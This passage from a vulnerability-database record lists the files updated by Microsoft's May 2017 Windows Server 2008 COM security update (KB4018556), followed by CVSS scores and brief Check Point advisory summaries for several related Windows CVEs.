03:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 09-Nov-2006| 03:58| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 401,408| 07-Apr-2017| 16:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:46| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 16:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:42| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:45| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:47| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:51| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 551,424| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 554,496| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Jan-2007| 19:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 27-Nov-2006| 21:37| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 16-Jan-2007| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 18-Jan-2007| 03:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 09-Nov-2006| 03:58| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 49,664| 12-Aug-2016| 18:55| x86| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 49,664| 07-Apr-2017| 15:23| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 894,976| 18-Mar-2016| 17:09| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 895,488| 07-Apr-2017| 15:23| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,208,568| 21-Mar-2016| 22:57| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,209,592| 11-Apr-2017| 04:10| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nNtkrnlpa.exe| 6.0.6002.19764| 3,610,856| 06-Apr-2017| 16:06| Not applicable| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 3,558,120| 06-Apr-2017| 16:06| Not applicable| Not applicable \nNtkrnlpa.exe| 6.0.6002.24089| 3,613,416| 07-Apr-2017| 15:31| Not applicable| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 3,562,216| 07-Apr-2017| 15:31| Not applicable| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 783,872| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 783,872| 07-Apr-2017| 15:24| x86| Not applicable \nSmss.exe| 6.0.6002.19598| 64,000| 06-Feb-2016| 00:32| x86| Not applicable \nSmss.exe| 6.0.6002.24089| 64,512| 07-Apr-2017| 14:22| x86| Not applicable\n", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows COM Elevation of Privilege Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2017-05-09T07:00:00", "id": "KB4018556", "href": "https://support.microsoft.com/en-us/help/4018556", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:36:01", "description": "An information disclosure vulnerability exists within Microsoft Windows. The vulnerability is caused when Microsoft Windows kernel improperly handles objects in memory. Successful exploitation of this issue might lead to leakage of sensitive information from the kernel.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Information Disclosure (CVE-2017-0258)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0369", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:35:55", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. The vulnerability is due to an error in the way Windows validate input before loading type libraries. A remote attacker can exploit this vulnerability to execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows COM Elevation of Privilege (CVE-2017-0214)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0366", "href": "", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T15:46:56", "description": "An elevation of privilege exists in Windows COM Aggregate Marshaler. The vulnerability is due to improper handling of certain objects in memory. An attacker who successfully exploited the vulnerability could run 